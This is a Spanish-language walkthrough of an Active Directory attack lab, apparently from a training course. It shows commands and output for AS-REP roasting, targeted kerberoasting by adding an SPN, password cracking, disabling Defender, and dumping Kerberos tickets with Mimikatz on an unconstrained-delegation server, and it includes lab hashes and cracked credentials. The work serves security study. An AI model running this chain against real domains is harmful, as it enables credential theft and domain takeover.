Learning Objective - 15

AS-REP

Enumerando cuentas con preautenticacion de kerberos desactivada.

PS C:\AD\Tools> Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth | select UserPrincipalName

UserPrincipalName
-----------------
VPN721user
VPN722user
VPN723user
VPN724user
VPN725user
VPN726user
VPN727user
VPN728user
VPN729user
VPN730user
VPN731user
VPN732user
VPN733user
VPN734user
VPN735user
VPN736user
VPN737user
VPN738user
VPN739user
VPN740user

Ahora, listamos los permisos para RDP Users.

PS C:\ad\tools> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}


ObjectDN                : CN=Control721User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName   : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN     : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass  : group

ObjectDN                : CN=Control722User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName   : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN     : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass  : group

ObjectDN                : CN=Control723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName   : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN     : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass  : group

ObjectDN                : CN=Control724User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName   : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN     : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass  : group

....
....
....
....

Podemos verlo tambien en el bloodhound:

Deshabilitamos la preautenticacion para el usuario control723user.

PS C:\ad\tools> Set-DomainObject -Identity Control723User -XOR @{useraccountcontrol=4194304} -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=Control723User)(name=Control723User)(displayname=Control723User)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(|(|(samAccountName=Control723User)(name=Control723User)(displayname=Control723User))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because [System.DirectoryServices.SearchResult]
does not contain a method named 'dispose'.
VERBOSE: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'Control723user'

Ahora, volvemos a listar los usuarion con preautenticacion de kerberos desactivada.

PS C:\AD\Tools> Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth | select UserPrincipalName

UserPrincipalName
-----------------
Control723user
VPN721user
VPN722user
VPN723user
VPN724user
VPN725user
VPN726user
VPN727user
VPN728user
VPN729user
VPN730user
VPN731user
VPN732user
VPN733user
VPN734user
VPN735user
VPN736user
VPN737user
VPN738user
VPN739user
VPN740user

Obteniendo el hash de un usuario sin pre autenticacion.

PS C:\ad\tools\ASREPRoast-master> Import-Module .\ASREPRoast.ps1
PS C:\ad\tools\ASREPRoast-master> Get-ASREPHash -UserName VPN723user -Verbose
VERBOSE: [Get-ASREPHash] DC server IP '172.16.2.1' resolved from current domain
VERBOSE: [Get-ASREPHash] Bytes sent to '172.16.2.1': 196
VERBOSE: [Get-ASREPHash] Bytes received from '172.16.2.1': 1626
[email protected]:5be0f46fcdb51fbbee27cdaa15372656$cf9c690ff12bd7c52410ebd84f49488a9073a48c0d6f40833f962a120c63c7edda12f43569de673cb759164ef3153dbb26539d561abafb6ef13ac19b5fb60c69c0f290fc201ca3730d6e076fff79875f7d9fe84ae2ea66daf26c064409cd1a59303194678e4d91e7da854e3d17f43418590d44ab9da251f76c28ed9108f5a70d815849a59132e10ba06046114e144d4a154469a4d40cc549bde5aa0320a36f905309409e93f05231ca5bed421ce87fcb41d94a1d4649392f30614ecdebfe9c480a5c3173952b9176fcfe7cf75c952c24c3ea95717bdcd00163b2e02b8d20066dd21b57459d637e06dc40e3814f62764c31227fd1f1105e36982ead2cd854ed4fe189f312b5b793b1

Obteniendo los hashes de todos los usuarios:

PS C:\ad\tools\ASREPRoast-master> Invoke-ASREPRoast

SamaccountName DistinguishedName                                              Hash
-------------- -----------------                                              ----
Control723user CN=Control723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local [email protected]:e7958a9f...
VPN721user     CN=VPN721User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:0ecfa7441359...
VPN722user     CN=VPN722User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:7246b9a1a086...
VPN723user     CN=VPN723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:1e73bfda62e3...
VPN724user     CN=VPN724User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:2119c7a152be...
VPN725user     CN=VPN725User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:006acf8b2c92...
VPN726user     CN=VPN726User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:94053359d939...
VPN727user     CN=VPN727User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:7597bf823904...
VPN728user     CN=VPN728User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:517606b875b8...
VPN729user     CN=VPN729User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:df2edb24eefe...
VPN730user     CN=VPN730User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:82d6003c3fe5...
VPN731user     CN=VPN731User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:6b20b7aa0f04...
VPN732user     CN=VPN732User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:ea9560f2e5f1...
VPN733user     CN=VPN733User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:b0304697d651...
VPN734user     CN=VPN734User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:cebe3bfee8db...
VPN735user     CN=VPN735User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:0302a1a92c85...
VPN736user     CN=VPN736User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:e10bff8d4fa5...
VPN737user     CN=VPN737User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:3bc64277460f...
VPN738user     CN=VPN738User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:cd344245b71e...
VPN739user     CN=VPN739User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:6e2baf56503b...
VPN740user     CN=VPN740User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local     [email protected]:27d73ab48bc5...

Obtenemos el hash del usuario Control723User

PS C:\ad\tools\ASREPRoast-master> Get-ASREPHash -UserName Control723User -Verbose
VERBOSE: [Get-ASREPHash] DC server IP '172.16.2.1' resolved from current domain
VERBOSE: [Get-ASREPHash] Bytes sent to '172.16.2.1': 200
VERBOSE: [Get-ASREPHash] Bytes received from '172.16.2.1': 1674
[email protected]:0d7b274e6bd6ed841f73c8b26f19ba01$cf509b565cfb52ec8243933b1f20c506ba17ed070c755acba74ebee4419d182fc71ad0bd331a4ee3309ce9120ba625c3e65585769c64908b058df12fb7cd69db64d7643b6bfc3dbf5f81ed26be3050b21f1da6c834c9935122e72e3e62bb7ba23388be8220999d969d09c235c0d8f2f30aedf08282d68c7acec96b1abf874d3aa174b7873e739e8b3029d6e310c956ff278f7588b9e07304249f055f56db3de3a9d0e167b360d3000aa2da926fcbcf59346ebc6145a8a1fbd4000987ebe9fa01603e0e5dc287d355a3ad105ee80c123f3de4565505daf05fc45ddb348139a7e76e80410efcaefdedb02ecac50e76321fd3688f50f4b215d237db929c894e85e0a4b650a7f9434744

Procedemos a crackearlo.

C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2024-03-01 11:03) 0g/s 181981p/s 181981c/s 181981C/s fffff1..eyphed
Session completed

Aunque... no lo crackeo :c

SET SPN

Enumeramos los permisos que tiene el grupo RDPUsers mediante ACLS.

ObjectDN                : CN=Control723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName   : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN     : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass  : group

ObjectDN                : CN=Support723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName   : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN     : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass  : group

Verificando si el usuario tiene SPN registrados.

PS C:\ad\tools\ASREPRoast-master> Get-DomainUser -Identity support723user | select serviceprincipalname

serviceprincipalname
--------------------

Agregando un SPN a un usuario que tengamos permisos.

PS C:\ad\tools\ASREPRoast-master> Set-DomainObject -Identity support723user -Set @{serviceprincipalname='dcorp/servicito'}

Luego validamos si el servicio se agrego correctamente.

PS C:\ad\tools\ASREPRoast-master> Get-DomainUser -Identity support723user | select serviceprincipalname

serviceprincipalname
--------------------
dcorp/servicito

Luego, dumpeamos los hashes de los usuarios kerberoasteables y crackeamos de nuevo.

PS C:\ad\tools> .\Rubeus.exe kerberoast /outfile:targetedhashes.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 3


[*] SamAccountName         : websvc
[*] DistinguishedName      : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet             : 11/14/2022 4:42:13 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\ad\tools\targetedhashes.txt


[*] SamAccountName         : svcadmin
[*] DistinguishedName      : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet             : 11/14/2022 9:06:37 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\ad\tools\targetedhashes.txt


[*] SamAccountName         : Support723user
[*] DistinguishedName      : CN=Support723User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : dcorp/servicito
[*] PwdLastSet             : 2/19/2024 11:51:15 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\ad\tools\targetedhashes.txt

Podemos ver que figura nuestro servicio agregado con su user correspondiente.

C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Support@123      (?)
1g 0:00:00:00 DONE (2024-03-02 12:43) 17.54g/s 175596p/s 301350c/s 301350C/s fffff1..eyphed
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Luego validamos que las credenciales sean correctas:

$crackmapexec smb 172.16.2.1 -u support723user -p 'Support@123'
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\support723user:Support@123

Delegacion de Kerberos

Unconstrained Delegation

Listando las pcs con delegacion.

PS C:\AD\Tools> Get-ADComputer -Filter {TrustedForDelegation -eq $True}


DistinguishedName : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
DNSHostName       : dcorp-dc.dollarcorp.moneycorp.local
Enabled           : True
Name              : DCORP-DC
ObjectClass       : computer
ObjectGUID        : d698b7ab-f29e-461b-9bc9-24a4a131c92d
SamAccountName    : DCORP-DC$
SID               : S-1-5-21-719815819-3726368948-3917688648-1000
UserPrincipalName :

DistinguishedName : CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
DNSHostName       : dcorp-appsrv.dollarcorp.moneycorp.local
Enabled           : True
Name              : DCORP-APPSRV
ObjectClass       : computer
ObjectGUID        : ca78344a-f7ac-4888-a371-10933b0e4b80
SamAccountName    : DCORP-APPSRV$
SID               : S-1-5-21-719815819-3726368948-3917688648-1106
UserPrincipalName :

Con las credenciales antes usadas, vamos a verificar cual de nuestras cuentas tiene accesos como localadmin en DCORP-APPSRV.

Probamos con el usuario websvc.

C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>runas /user:dcorp\websvc powershell.exe
Enter the password for dcorp\websvc:
Attempting to start powershell.exe as user "dcorp\websvc" ...

PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\ad\Tools> Find-PSRemotingLocalAdminAccess
PS C:\ad\Tools>

Y ahora con el otro usuario appadmin.

C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>runas /user:dcorp\appadmin powershell.exe
Enter the password for dcorp\appadmin:
Attempting to start powershell.exe as user "dcorp\appadmin" ...

PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess
dcorp-adminsrv
dcorp-appsrv
PS C:\ad\Tools>

Movemos en InvokeMimikatz y el rubeus al computador.

PS C:\AD\Tools> cp .\Invoke-Mimikatz.ps1 \\dcorp-appsrv\C$\
PS C:\AD\Tools> cp .\Rubeus.exe \\dcorp-appsrv\C$\

Accedemos a la maquina con nuestra sesion.

PS C:\AD\Tools> winrs -r:dcorp-appsrv cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\appadmin>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\appadmin>

Luego ejecutamos mimikatz para extraer los tickets, tambien desactivamos el defender para no tener problemas.

PS C:\> Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIOAVProtection $true
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\> . .\Invoke-Mimikatz.ps1
. .\Invoke-Mimikatz.ps1
PS C:\> Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::tickets /export

Authentication Id : 0 ; 5652157 (00000000:00563ebd)
Session           : Network from 0
User Name         : appadmin
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 3/2/2024 3:25:47 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1117

         * Username : appadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:19:27 PM ; 3/3/2024 1:19:26 AM ; 3/9/2024 3:19:26 PM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             48fd7b2d67275c81b3d55a0668863839889faca9c4236baa54aa62a157031517
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;563ebd][email protected] !

Authentication Id : 0 ; 5641528 (00000000:00561538)
Session           : Network from 0
User Name         : appadmin
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 3/2/2024 3:23:14 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1117

         * Username : appadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:19:27 PM ; 3/3/2024 1:19:26 AM ; 3/9/2024 3:19:26 PM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             48fd7b2d67275c81b3d55a0668863839889faca9c4236baa54aa62a157031517
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;561538][email protected] !

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DCORP-APPSRV$
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 2/19/2024 11:31:00 PM
SID               : S-1-5-20

         * Username : dcorp-appsrv$
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:25:29 PM ; 3/3/2024 1:10:28 AM ; 3/9/2024 5:35:48 AM
           Service Name (02) : cifs ; dcorp-dc.dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (02) : cifs ; dcorp-dc.dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             a7c2e48b643ac95ad353b6f31bf15acf02b1d84e1f91ac78a5bc37c44993640e
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 13       [...]
           * Saved to file [0;3e4]-0-0-40a50000-DCORP-APPSRV$@cifs-dcorp-dc.dollarcorp.moneycorp.local.kirbi !
         [00000001]
           Start/End/MaxRenew: 3/2/2024 5:35:48 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
           Service Name (02) : ldap ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (02) : ldap ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             93db569b86742fbcb7fddd6f4e0b5c193638fbfcbc9560c8a41d96f2eeddf1b7
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 13       [...]
           * Saved to file [0;3e4]-0-1-40a50000-DCORP-APPSRV$@ldap-dcorp-dc.dollarcorp.moneycorp.local.kirbi !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:10:28 PM ; 3/3/2024 1:10:28 AM ; 3/9/2024 5:35:48 AM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( $$Delegation Ticket$$ )
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             c875601e2be22cfd01061d30a6d3a7de5b839b8260f29ac8427c37bc44e4b0e5
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;3e4]-2-0-60a10000-DCORP-APPSRV$@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
         [00000001]
           Start/End/MaxRenew: 3/2/2024 3:10:28 PM ; 3/3/2024 1:10:28 AM ; 3/9/2024 5:35:48 AM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             efc4444b9ff18075eea505f16453c9d6f6d8161f4e5f32140cc06feadb6546b6
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;3e4]-2-1-40e10000-DCORP-APPSRV$@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !

Authentication Id : 0 ; 21117 (00000000:0000527d)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/19/2024 11:31:00 PM
SID               : S-1-5-96-0-0

         * Username : DCORP-APPSRV$
         * Domain   : dollarcorp.moneycorp.local
         * Password : Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19un%6QdFsVpR@Pc[xv$W&=< V

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket

Authentication Id : 0 ; 21023 (00000000:0000521f)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/19/2024 11:31:00 PM
SID               : S-1-5-96-0-1

         * Username : DCORP-APPSRV$
         * Domain   : dollarcorp.moneycorp.local
         * Password : Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19un%6QdFsVpR@Pc[xv$W&=< V

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket

Authentication Id : 0 ; 5809266 (00000000:0058a472)
Session           : Network from 0
User Name         : appadmin
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 3/2/2024 3:29:12 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1117

         * Username : appadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:19:27 PM ; 3/3/2024 1:19:26 AM ; 3/9/2024 3:19:26 PM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             48fd7b2d67275c81b3d55a0668863839889faca9c4236baa54aa62a157031517
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;58a472][email protected] !

Authentication Id : 0 ; 5809242 (00000000:0058a45a)
Session           : Network from 0
User Name         : Administrator
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 3/2/2024 3:29:12 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-500

         * Username : Administrator
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:29:12 PM ; 3/3/2024 1:29:12 AM ; 3/9/2024 3:29:12 PM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : Administrator ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             5d81ddd480eec98e1484c31688e6bd12765f8a48a46d677487b383c8ac09744e
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;58a45a]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !

Authentication Id : 0 ; 5805266 (00000000:005894d2)
Session           : Network from 0
User Name         : Administrator
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 3/2/2024 3:28:12 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-500

         * Username : Administrator
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:28:12 PM ; 3/3/2024 1:28:12 AM ; 3/9/2024 3:28:12 PM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : Administrator ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             18d125ff6b7eae889300b7a19212985fcf31df41804e9e54a5960ca77b3080aa
